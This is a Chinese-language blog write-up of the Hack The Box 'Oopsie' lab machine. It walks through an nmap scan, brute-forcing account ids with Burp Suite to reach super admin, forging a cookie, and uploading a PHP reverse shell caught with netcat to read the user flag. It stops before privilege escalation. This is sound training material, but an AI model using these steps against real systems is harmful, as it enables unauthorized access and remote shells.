HTB-Oopsie-Write_up

前言 Foreword

这篇Write_up是我对于HTB Oopsie Box的题解

总的来说算是比较简单的一个box，不过也花费了我一些时间

我是一个13岁的渗透测试爱好者，这是我的博客

端口扫描 Fingerprinting

目标靶机IP的扫描结果如下

┌──(root💀kali)-[~]
└─# nmap -sC -sV 10.10.10.28
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-13 13:32 UTC
Nmap scan report for 10.10.10.28
Host is up (0.75s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.76 seconds

网页分析 Web APP Analyzing

可以看到服务器的80端口是打开的，尝试浏览器访问：

网页加载出来了，可是并没有什么可供我们进一步分析的空间

尝试使用Burp Suite分析目标请求：

发现一个有意思的GET请求: /cdn-cgi/login/script.js 可能存在一个隐藏的登陆界面

访问 https://10.10.10.28/cdn-cgi/login 出现登陆界面 尝试使用账号admin(常用账号名称)和上一个box的密码MEGACORP_4dm1n!!作为密码 登陆成功

点击上方upload tab后发现需要super admin 权限 点击Account Tab查看目前登陆的账号信息 只是普通admin权限：

URL里有一个参数id=1可能代表目前的账号类型 但我们并不知道super admin的id是多少 或许可以进行暴力破解

使用Burp Suite 暴力破解：

for i in `seq 1 100`; do echo $i; done

这条bash的目的是生成一个1到100的list 方便生成payload

接下来将这个 list 粘贴进 Burp Suite Intruder tab 的 payload 里，然后去 options 的 redirections 选项里选择 Always 并勾选下面的 Process cookies

最后我们可以在id=30的时候发现Name变成了super admin：

使用相关浏览器插件修改 cookie 之后再访问 Uploads 页面则可正常显示：

这里出现了一个上传文件的页面 而且没有限制文件类型 于是我们可以尝试上传一个 PHP 的 Reverse Shell

在 Kali 上的路径为/usr/share/webshells/php/php-reverse-shell.php

注意要修改文件里的 IP 为你ifconfig中的tun0

上传之后 nc -lvnp 1234监听反向连接 然后curl http://10.10.10.28/uploads/php-reverse-shell.php 可以收到一个来自服务器的反向连接：

cat home/robert/user.txt 获取到Flag：

结束…真的结束了么

这样获取用户权限的部分就结束了

不过还有获取系统权限的提权部分

所以…

未完待续…